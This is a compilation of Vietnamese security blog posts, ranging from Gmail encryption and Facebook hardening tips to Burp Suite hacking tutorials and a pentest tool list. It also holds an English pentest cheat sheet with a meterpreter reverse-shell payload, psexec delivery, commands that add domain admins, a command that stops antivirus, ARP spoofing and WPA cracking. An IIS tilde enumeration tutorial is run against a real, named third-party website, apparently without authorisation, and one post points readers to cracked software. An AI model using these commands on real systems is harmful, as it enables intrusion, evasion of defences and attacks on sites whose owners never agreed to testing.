Trang

Cách gửi email mã hóa qua Gmail trên Chrome

Phần mở rộng (extension) miễn phí của Google Chrome cho phép gửi đi email được mã hóa từ Gmail tới các dịch vụ email khác. Bạn cần gửi đi một email chứa thông tin nhạy cảm? Mọi email gửi đi theo cách thông thường đều có nguy cơ bị chặn hoặc bị “hack” trước khi đến tay người nhận.

Để đề phòng điều này, bạn có thể sử dụng một phần mở rộng (extension) miễn phí cho Google Chrome có tên SafeGmail. SafeGmail cho phép bạn gửi đi các email đã mã hóa.

[Hình: gmail1.jpg]

Email sẽ được mã hóa và giải mã ngay trong trình duyệt, vì thế chỉ bạn và người nhận xem được nội dung thư. Để đảm bảo tính bí mật, email vẫn ở tình trạng mã hóa trong cả hộp thư đi của người gửi và hộp thư đến của người nhận. Email cũng sẽ tự động hết hạn sau một khoảng thời gian ngẫu nhiên.

Bạn có thể dùng SafeGmail để gửi email từ hộp thư Gmail của mình tới người nhận dùng bất kỳ dịch vụ email nào, bao gồm Gmail, Yahoo! Mail…

Để cài đặt phần mở rộng này, truy cập trang SafeGmail extension, nhấn vào nút “Add to Chrome”.

[Hình: gmail2.jpg]

Khi hộp thoại “Confirm New Extension” xuất hiện, nhấn nút “Add”.

[Hình: gmail3.jpg]
Sau khi việc cài đặt hoàn tất, một hộp tin nhắn sẽ xuất hiện. Khởi động lại Google Chrome và mở lại trang Gmail.

[Hình: gmail4.jpg]

Bạn sẽ thấy SafeGmail đã thêm lựa chọn “Encrypt?” trong màn hình soạn thảo của Gmail. Sau khi viết xong email và nhập địa chỉ người nhận cũng như tiêu đề email, chọn hộp đánh dấu bên cạnh “Encrypt?”, sẽ xuất hiện hai hộp “Question”“Answer”. Nhập một câu hỏi và câu trả lời xác nhận mà chỉ bạn và người nhận được biết. Nhấn “Send + Encrypt”.

[Hình: gmail5.jpg]

Email được mã hóa khi chuyển tới người nhận sẽ có hình như bức ảnh dưới đây, giữa hai dòng đường kẻ đứt nét là một dòng ký tự bao gồm cả chữ cái và chữ số. Copy đoạn ký tự này trước khi nhấn vào link “Here” ở dòng “Click Here to access the mail content.”

[Hình: gmail6.jpg]

Trả lời câu hỏi xác nhận và nhấn “Submit” để truy cập màn hình cho phép giải mã email.

[Hình: gmail7.jpg]

Màn hình Mail Decryption hiện lên. Paste (dán) đoạn ký tự vừa copy vào hộp và nhấn “Show My Mail”.

[Hình: gmail8.jpg]

Nội dung tin nhắn sau khi giải mã sẽ hiển thị ở cửa sổ trình duyệt.

SafeGmail cũng cho phép bạn nhập các ký tự ngôn ngữ đặc biệt trong email cần mã hóa.
 

Gửi tệp tin .exe ngay trong Gmail

Gmail và Yahoo Mail hay bất cứ dịch vụ mail nào khác đều không hỗ trợ đính kèm các tệp tin có định dạng .exe (file chạy) và một số định dạng khác. Tuy nhiên, có rất nhiều cách để bạn gửi file chạy qua email, trong đó phổ biến nhất là nén file đó thành định dạng RAR, ZIP hay 7Z rồi mới tiến hành đính kèm.

Một thủ thuật khá đơn giản có thể giúp bạn thực hiện điều này ngay trong Gmail bằng cách sử dụng dịch vụ lưu trữ trực tuyến Google Drive.

[Hình: image001.png]

Gmail cho phép người dùng upload và chia sẻ các tệp tin thông qua Google Drive. Do đó, để khai thác thủ thuật này, trước tiên bạn cần phải kích hoạt tính năng New compose trong hộp thư của mình (để kích hoạt tính năng này, sau khi nhấn nút Compose để soạn thư mới, bạn nhìn lên phía trên bên phải nhãn Labels sẽ thấy dòng chữ Try out the new compose experience, hãy nhấn vào liên kết đó rồi nhấn tiếp nút Go it khi có thông báo hiện ra).

Kể từ giờ, mỗi khi bạn soạn thư mới thì sẽ có một cửa sổ New Message riêng được hiển thị tại góc dưới bên phải trang Gmail giống như cửa sổ chat. Trên thanh công cụ phía dưới cửa sổ soạn thư, bạn hãy rê chuột vào biểu tượng Attach files, khi đó biểu tượng xuất hiện ngay bên phải chính là biểu tượng của Google Drive (insert files using Drive). Một khi sử dụng tùy chọn này, bạn có thể upload một tệp tin với bất kỳ kiểu định dạng nào bao gồm cả file chạy (.exe).
[Hình: image003.png]
[Hình: image005.png]

Trong cửa sổ Insert files using Google Drive, bạn có thể upload một tệp tin từ máy tính bằng cách nhấn nút Select files from your computer hoặc sử dụng các tệp tin trực tiếp trong mục My Drive chứa dữ liệu đã có sẵn trong Google Drive, tiếp theo nhấn nút Insert để đính kèm nó, sau cùng nhấn send để gửi thư và bạn sẽ phải chọn Send & share để thừa nhận việc chia sẻ từ Google Drive.

[Hình: image008.jpg]

Bây giờ người nhận mở hộp thư mà bạn gửi tới, họ sẽ click vào file đã gửi để chuyển qua trang chứa tệp tin trong Goog Drive của bạn rồi nhấn nút Download để tải tệp tin về máy.

Tóm lại, với phương thức này cũng chẳng khác gì việc bạn share dữ liệu cho một người nào đó trong Google Drive thông qua email của họ, nhưng khi đang làm việc trong hộp thư Gmail thì sử dụng cách làm này sẽ mang lại thuận tiện đối với bạn.
 

Burp suite – Intercept Proxy [P 2]

Rất vui được gặp lại các bạn trong phần 2 của Burp Suite, công cụ Intercept Proxy cực kỳ hữu ích. Trong phần này mình sẽ đưa ra một số ví dụ cụ thể nhất khi áp dụng Brup Suite trong kỹ thuật hacking. Đây là những kinh nghiệm mình đúc rút được và có học hỏi từ internet nữa. Bài viết bao gồm 2 ví dụ (thực ra có nhiều lắm nhưng trong lúc thảng thốt mình ko nhớ rõ trang nào bị để demo nữa :D ).
XSS
XSS thông thường thì chúng ta không nói nhiều trong bài viết này nữa vì đưa script vào URL, thêm các thao tác sửa đổi, encode để chạy… Tuy nhiên, đã bao giờ bạn dùng acunetix nhận được thông báo như này:
1
Nói thật, trước khi biết sử dụng các công cụ chỉnh sửa http header, mình gặp cái này cũng há hốc mồm ko biết làm sao (đã POST lại phải URL encode), nhưng hiện tại thì rất đơn giản chúng ta chỉ cần sử dụng trình duyệt request đến url bị lỗi và bật brup suite ra hứng. Gói tin request thông thường
2
Thay thể luôn bằng request này (POST đã thay cho GET) một cách dễ dàng và forward gói tin đi
3
Xong,
4
Ngoài ví dụ này (POST) thì ngay cả khi gói tin GET nhưng nhiều khi chạy thẳng qua trình duyệt cũng ko được. Lúc đó Brup Suite là một lựa chọn tối ưu
FCKeditor 2.6.8 ASP upload Bypass
Điểm yếu này mới được Mostafa Azizi và Soroush Dalili công bố trong năm nay (many thanks), việc exploit lợi dụng điểm yếu khi fckeditor trên website victim sử dụng ASP làm connector để upload file. Điều thú vị là 99% tấn công thực hiện thành công nhờ Brup Suite. Chi tiết điểm yếu này các bạn có thể Google, mình sẽ đi luôn vào việc exploit. Do nó bao gồm nhiều thao tác nên để tiện theo dõi, mình làm video demo sau
 

Burp suite – Intercept Proxy [P 1]

Có lẽ tới thời điểm hiện tại burpsuite là công cụ đã rất phổ biến và rất nhiều người thành thạo sử dụng công cụ này. Do đó bài viết của mình chỉ giới thiệu sơ lược tính năng và thực nghiệm áp dụng công cụ này trong hoạt động pentest của mình.
Công cụ có cả bản free và pro (thương mại). Bản pro có tình năng cao cấp hơn là chức năng scan. Tất nhiên bản pro sẽ mất phí nhưng các bạn hoàn toàn có thể kiếm bản đã được cr*ck trên mạng không khó khăn mấy. Mình sẽ đi vào một số tính năng chính của bản free và chức năng scan của Pro
Thiết lập để sử dụng burpsuite
Trước tiên vì burpsuite được viết trên nền java do đó cần có Java Runtime Enviroment để chạy, lưu ý, các bạn nên tải bản jre 6 vì bản 7 mới nhất thì burpsuite lại không tương thích (chuối)
Thiết lập trên trình duyệt để các traffic từ máy sẽ đi qua burpsuite
Intercept Traffic
Thử nghiệm với một page bất kỳ ta có thể thấy traffic sẽ bị chặn tại burp suite trước, ta có thể chọn forward để gói tin đi tiếp hoặc drop để bỏ gói tin, dĩ nhiên thông tin trong traffic chúng ta hoàn toàn có thể thay đổi được trước khi forward
Repeater
Đây là một thành phần rất hữu ích của Burp Suite, nếu bạn cần thử nghiệm thay đổi header nhiều lần thì repeater là những gì mà bạn cần. Từ header chặn được, các bạn click chuột phải và chọn send to repeater, sau đó chuyển sang tab repeater sẽ thấy header mình cần thao tác. Công dụng của repeater là bạn có thể chỉnh sửa header thoải mái rồi chọn Go sau đó đợi header respone để biết server sẽ làm gì với header của mình. Nó đặc biệt hữu dụng vì có thể chỉnh sửa, Go nhiều lần mà không mất công vào lại browser, điền thông tin rồi submit rồi lại chỉnh trong proxy (quá tốn thời gian).
Encode/Decode
Chức năng mã hóa, giải mã của Brup Suite rất tốt, nó hỗ trợ rất nhiều loại mã và giải mã
Brute Force
Brup Suite có thể kiêm chức năng HTTP Authentication Testing với tính năng Intruder. Ví dụ, từ trang login quản trị, mình nhập thông tin bất kỳ là username=admistrator&password=123456. Trong proxy của Brup Suite sẽ thấy
Click chuột phải chọn send to intruder
Trong tab positions,chọn attack type là cluster bomb, bên dưới ta có thấy header với các giá trị được đánh dấu bởi ký tự $, tuy nhiên chúng ta chỉ cần quan tâm đến username và password, do đó trước hết hãy clear $ để bỏ hết đi và chỉ add $ bao quan giá trị của 2 biến mà ta quan tâm (ở đây là administrator và 123456) như hình vẽ.
OK như vậy trong tab payload bên cạnh sẽ có 2 payload set (tương ứng với với biến username và password). Tiến hành nhập giá trị cho biến 1 (username), có thể nhập bằng tay từng giá trị hoặc load file username mà bạn có
Tiến hành nhập giá trị cho biến 2 (password) tương tự biến 1
Từ menu intruder chọn attack
Kết quả
Status là 302 (Found) có nghĩa là username và password không đúng (found chứ không phải OK nhé, các bạn cần để ý cái này). Một số website thì code http khi đăng nhập sai là 302, 401 (access deny). Còn trong trường hợp nhập đúng sẽ là 200 (OK) hoặc 202 (Accepted). Do đó mã 302 thì phải cố gắng tiếp thôi :D
Scanner
Chức năng Scanner chỉ có trong phiên bản Pro, chất lượng scan của Brup Suite là khá tốt, có thể tham khảo thêm tại http://www.sectoolmarket.com/ để có cái nhìn tổng quan chất lượng các công cụ scan
Đặc điểm của brup suite là scan thụ động, chúng ta view site đến đâu nó sẽ scan đến đó, một vài kết quả scan được
Chúng ta cũng có thể cho brup suite scan chủ động một url nào đó qua proxy, chọn actively scan this item
Trên đây là các tính năng chính của Brup Suite, bài viết tới mình sẽ đi sâu vào ứng dụng của Brup Suite trong các trường hợp cụ thể.
 

Bảo vệ tối ưu cho tài khoản Facebook

Để bảo mật quyền riêng tư của người dùng trên Facebook, người dùng có thể tham khảo một số cách làm dưới đây để bảo đảm an toàn cho trang mạng xã hội của mình trong năm mới. Bạn có thể theo dõi các lần đăng nhập vào trang Facebook của mình qua email, tin nhắn hoặc sử dụng kết nối SSL để bảo vệ tài khoản.

Dưới đây là các cách bảo vệ tài khoản Facebook của chúng tôi:

Thay đổi mật khẩu định kỳ

[Hình: facebook11.jpg]

Cách đơn giản nhất là người dùng thường xuyên thay đổi định kỳ mật khẩu tài khoản của mình nhưng đừng đặt quá đơn giản sẽ dễ dàng bị hacker đánh cắp. Một mật khẩu đủ mạnh phải bao gồm: chữ, số, ký tự đặc biệt, chữ viết hoa và có độ dài hơn 8 ký tự. Ví dụ: TeSt@123@tSeT

Để thay đổi mật khẩu bạn làm như sau: "Account settings > General > Password". Sau khi đổi lại mật khẩu mới, chọn Save changes.

Thay đổi câu trả lời bí mật

Người dùng không nên chọn những câu hỏi bí mật như: Bạn sinh ra ở đâu? Tên một người bạn thân?... Những thông tin này có thể bị các hacker dễ dàng tìm ra khi truy cập vào Facebook của bạn.

Vì vậy, nên chọn những câu hỏi bí mật có tính chất ngẫu nhiên, mang những thông tin mà khó có thể đoán được. Ví dụ: Bạn thích chơi game gì nhất? Câu trả lời: Football Manager hoặc Call of Duty.

Để thay đổi câu trả lời bí mật, bạn làm như sau: "Account settings > Security > Security Question", sau đó nhập mật khẩu để lưu thay đổi, cuối cùng chọn Save Changes.

Đăng nhập tài khoản Facebook bằng cách xác nhận SMS

[Hình: facebook33.jpg]

Có thể lựa chọn một cách đăng nhập an toàn hơn đó là xác nhận qua SMS. Cứ mỗi lần đăng nhập Facebook trên một máy tính lạ, Facebook sẽ gửi một tin nhắn trong đó có mã xác nhận về số điện thoại mà người dùng đã đăng ký để nhận trước đó. Điều này chỉ xảy ra một lần mỗi khi bạn dùng máy tính hoặc điện thoại lạ để đăng nhập vào tài khoản Facebook của mình.

Để bật chức năng này, làm như sau: "Account settings > Security > Login Approvals". Sau đó, người dùng cung cấp số điện thoại nhận tin nhắn theo chỉ dẫn.

Gửi email thông báo mỗi lần đăng nhập

[Hình: facebook44.jpg]

Bạn chọn "Account settings > Security > Login notifications", tích vào mục Email rồi kết thúc bằng phím Save Changes.

Sử dụng kết nối SSL (Secure Sockets Layer) cho Facebook

[Hình: facebook3.jpg]

Ngoài 4 cách do trên, bạn cũng có thể sử dụng kết nối SSL để bảo vệ tài khoản Facebook. Kết nối này giúp nâng cáo cơ chế bảo mật cho website của bạn.

Để sử dụng kết nối SSL chọn "Account settings > Security > Secure Browsing", tiếp tục tích vào mục Browse Facebook on a secure connection (https) when possible, kết thúc bằng phím Save Changes.
 

[Tool Security] Windows Tools For Penetration Testing

Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system.
HashCheck Shell Extension
The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).
Netcat
Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
Metasploit Framework
The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
RealVNC Viewer

Remote access software for desktop and mobile platforms.
GetIf
SNMP tool that allows you to collect information about SNMP devices.
Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.
PuTTY
PuTTY is an SSH and telnet client for the Windows platform.
Pass The Hash Toolkit
The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes.
Cachedump
Recovering Windows Password Cache Entries.
Fport
Identify unknown open ports and their associated applications.
Nbtscan
This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.
Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Winfo
Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.
ClearLogs
ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.
SQLDict
SQLdict is a dictionary attack tool for SQL Server.
PMDump
PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.
GrabItAll
GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too.
DumpUsers
DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.
BrowseList
BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).
Remoxec
Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).
WMICracker
Brute-force tool for Windows Management Instrumentation (WMI).
Venom
Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.
SMBAT
The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms.
RPCScan
RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
LSASecretsDump
LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window.
SQLPing
SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.
OAT
The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.
Pwdump7
Extract password hashes from local user accounts.
PsTools
The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.
Incognito
Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.
DumpSec
DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.
X-Deep32
X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.
LC5
Windows password cracker.
Ophcrack
Ophcrack is a free Windows password cracker based on rainbow tables.
SiVuS
SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

Nguồn Blog
http://pentestlab.wordpress.com/
 

Cheat Sheet For Pentest By AverageSecurityGuy

Mount Shares


# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

# Mount Windows Share on Linux
mount -t cifs //server/share -o username=,password= /mnt/point

Add Administrative Accounts


# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

stdapi_sys_process_execute: Operation failed: 1314


# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

Metasploit: Use custom executable with psexec


# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter 
# session open in multi/handler

Disable Antivirus


# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic


ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK


# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

Create an IP List with Nmap


nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules


for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} 
-w:<wordlist> <password_file> ; done 

Nguồn Blog
http://averagesecurityguy.info/cheat-sheet/ 
 

[Tutorial] Race condition attack trên ứng dụng web


Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
Xem xét đoạn code sau của ngân hàng trong việc trừ tiền :

Khi tiến trình 1 đang thực hiện câu lệnh $tongtien = $tongtien – $sotien thì một tiến trình 2 của người A đang đòi rút chèn ngang, lúc này hệ thống sẽ tạm dừng tiến trình 1 đang xử lý để quay sang xử lý tiến trình 2 :

Lúc này khi bắt đầu xử lý tiến trình 2, tổng tiền chưa được cập nhật bởi tiến trình 1 đã tạm dừng. Do đó số tiền trong tk lúc này vẫn là 10000 và sau khi thực hiện xong cả 2 tiến trình thì tổng tiền vẫn là 9990 mặc dù đã rút 2 lần. Như vậy race condition đã xảy ra khi mà 1 tiến trình chèn ngang tiến trình khác trong lúc các tham số vẫn chưa kịp cập nhật.
Ở đây mình tạo 1 đoạn code lấy tiền với khá nhiều việc, làm cho thời gian xử lý nó lên tới tận 1,2s và cố thử rút 8 lần mà chỉ bị trừ 10$
B1, kiểm tra tài khoản ban đầu và xem access log , lúc này ta đang có 10000:

B2, Xử dụng 1 đoạn python để cùng 1 lúc gửi 8 request, mỗi request đều rút 10$ trong cùng 1 thời gian và xem kết quả trả về :
Như vậy sau 10 request, tổng tiền chỉ bị trừ 10$ trong khi đã rút đến 8 lần.
B3. Kiểm tra log file ta thấy 8 request này tới cùng lúc. Và bởi vì server phải đòi hỏi đến 1 giây để xử lý 1 giao dịch, do đó 8 request này đã làm xuất hiện race condition và bị chèn ngang lẫn nhau.


Nguồn Blog
http://antoanthongtin.wordpress.com
 

[TUT] - Khai thác lỗi Microsoft IIS tilde character

Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"

Attack details:
Demo trên site http://hp-aptech.edu.vn

Đầu tiên ta sẽ kiểm tra chữ cái đầu tiên trong tên các file hay folder. Nếu chữ cái đó tồn tại thì sẽ nhận được 1 response 404 - File Not Found. Còn nếu không tồn tại chữ cái đó thì sẽ nhận được 1 response 400 - Bad Request

Bắt đầu thử với link sau:
http://hp-aptech.edu.vn/a*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/b*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/c*~1*/.aspx- -> 404 => Có tồn tại
………
http://hp-aptech.edu.vn/f*~1*/.aspx ->400 Bad request=> Không tồn tại

Giờ ta sẽ thử với chữ cái thứ 2:
http://hp-aptech.edu.vn/ca*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cb*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cc*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/co*~1*/.aspx ->404 =>Có tồn tại

Tiếp tục với những chữ cái tiếp theo:
http://hp-aptech.edu.vn/coa*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cob*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/con*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/com*~1*/.aspx -> 404 => Có tồn tại
Cú tiếp tục đoán tiếp nhé
Muốn khai thác thành công kiểu lỗi này phụ thuộc nhiều yếu tố
+Website chạy IIS
+Có khả năng đoán folder,file..-> đoán file thần chưởng
+ Khi mà tìm được folder,file phải có quyền truy cập đến
+Folder,file tìm được có dữ liệu quan trọng
……...
Cụ thể muốn tìm hiểu lỗi này vào đây. Trong đây có tool sẽ giảm thiểu thời gian cho các bạn phải đoán folder,file. Muốn chạy được tool này phải cài java.
http://code.google.com/p/iis-shortname-scanner-poc/

Tut by kakavn_85

 

Một số cách kiểm tra độ an toàn của liên kết

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Các liên kết (link) không an toàn xuất hiện ngày càng nhiều trên các trang blog, diễn đàn, mạng xã hội và các trang chia sẻ dữ liệu.

Khả năng ngụy trang của chúng cũng ngày càng trở nên tinh vi hơn. Khi bạn vô tình click vào những link dạng này, bạn có thể sẽ được chuyển đến một trang web chứa virus hoặc mã độc… có thể lây nhiễm vào máy tính và đánh cắp dữ liệu cá nhân của bạn.

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Bài viết sau đây xin giới thiệu đến các bạn một vài cách có thể làm việc này một cách hoàn toàn miễn phí, nhanh chóng và không yêu cầu bạn phải cài đặt thêm bất cứ thứ gì vào máy tính.

1. Xem địa chỉ thực của link ngay trên trình duyệt

Chắc có lẽ bạn đã từng một lần gặp phải một link dạng văn bản liên kết như nhấp vào đây, tải tại đây, download hoặc click here… nhưng khi bấm vào nó thì bạn lại được đưa đến một địa chỉ khác chứ không phải là địa chỉ mà bạn mong muốn. Khi gặp các link thế này, bạn tạm thời đừng click chuột vào nó ngay mà hãy rê chuột lên nó rồi nhìn xuống phía dưới góc trái của trình duyệt web bạn đang sử dụng, địa chỉ thật của nó sẽ hiện ra. Khi đã chắc địa chỉ bạn nhìn thấy là an toàn và đúng là địa chỉ bạn mong muốn thì bạn hãy click vào nó ngược lại thì bạn nên cân nhắc kỹ hoặc tham khảo tiếp các cách sau để kiểm tra độ an toàn của nó.

2. Sử dụng các dịch vụ quét link

Các dịch vụ quét link là những trang web hoặc plug-in cho phép bạn nhập vào địa chỉ URL của một link mà bạn nghi ngờ và kiểm tra độ an toàn của nó. Có rất nhiều dịch vụ miễn phí và đáng tin cậy có thể làm được việc này và URL Void là một trong số đó. URL Voidlà một dịch vụ miễn phí được phát triển bởi công ty NoVirusThanks, nó cho phép bạn phân tích địa chỉ của một website với các bộ máy lưu trữ các tên miền đen (domains blackists) nổi tiếng như Google SafeBrowsing, My Wot, và Norton SafeWeb và nhanh chóng trả về kết quả là độ an toàn của địa chỉ đó.

[Hình: link-an-toan1.jpg]

3. “Soi” địa chỉ thật của link rút gọn

URL Void là một dịch vụ quét link khá tốt. Tuy nhiên nó chỉ có thể quét và kiểm tra địa chỉ URL của link ở dạng đầy đủ, đối với các liên kết dạng rút gọn từ các dịch vụ như bit.ly, ow.ly và tinyurl.com nó thường cho kết quả không chính xác. Đối với những link dạng này, bạn có thể nhờ đến dịch vụ Sucuri.Sucuri sẽ giúp bạn “soi” ra địa chỉ thật của các link rút gọn và sau đó kiểm tra độ an toàn của nó bằng cách bộ máy như Google SafeBrowsing, Norton Safeweb và Phish Tank. Bên cạnh Sucuri, bạn cũng có thể tham khảo một số dịch vụ có khả năng tương tự khác như http://untiny.com, http://urlxray.com...

[Hình: link-an-toan2.jpg]

4. Cách an toàn để sao chép địa chỉ URL của link

Các dịch vụ tương tự như URL Void và Sucuri đều yêu cầu bạn phải nhập (gõ hoặc paste) các địa chỉ URL của link nghi ngờ – nhưng làm thế nào để bạn có thể lấy được một địa chỉ URL của link một cách nhanh chóng và an toàn mà không cần phải mở nó? Rất dễ. Bạn chỉ cần nhấp phải chuột vào link bạn muốn lấy địa chỉ URL rồi chọn Copy Shortcut (đối với IE), Copy Link Location (đối với Firefox) hoặc Copy Link Address (đối với Chrome). Địa chỉ URL sẽ được sao chép vào clipboard ngay sau đó và bạn có thể sử dụng nó để kiểm tra độ an toàn với các dịch vụ trên.

[Hình: link-an-toan3.jpg]
 

Cách đơn giản để phát hiện có người sử dụng máy tính của bạn

Có nhiều người sử dụng máy tính không thích đặt mật khẩu cho máy của mình, nhất là khi làm việc ở văn phòng, tuy nhiên điều này cũng gây ra một số rắc rối khi bạn không biết có ai đã sử dụng máy tính của mình lúc đi vắng hay không.


Hoặc giả sử bạn có một đứa em nghịch ngợm hay vài đứa bạn cùng phòng và muốn kiểm tra rằng có ai đã sử dụng máy tính của bạn khi chưa được sự đồng ý. Thật may là Windows và Mac đều có các tính năng giúp bạn kiểm tra những sự đăng nhập trái phép này.

[Hình: Su-dung-1.jpg]

Windows

Trong Windows, bạn có thể kích hoạt tính năng kiểm soát đăng nhập, để nó theo dõi và ghi lại tên tài khoản sử dụng và thời gian mỗi lần đăng nhập vào máy. Để kích hoạt tính năng này, bạn có thể thực hiện theo các bước sau:

[Hình: Su-dung-2.jpg]

Vào Start,"gpedit.msc" trong menu Start và ấn Enter. Sau đó cửa sổ Local Group Policy Editor sẽ hiện ra, trong cây danh sách bên trái, tìm đến Local Computer Policy > Computer Configuration > Windows Settings > Security Settings > Local Policies > Audit Policy.

[Hình: Su-dung-3.jpg]

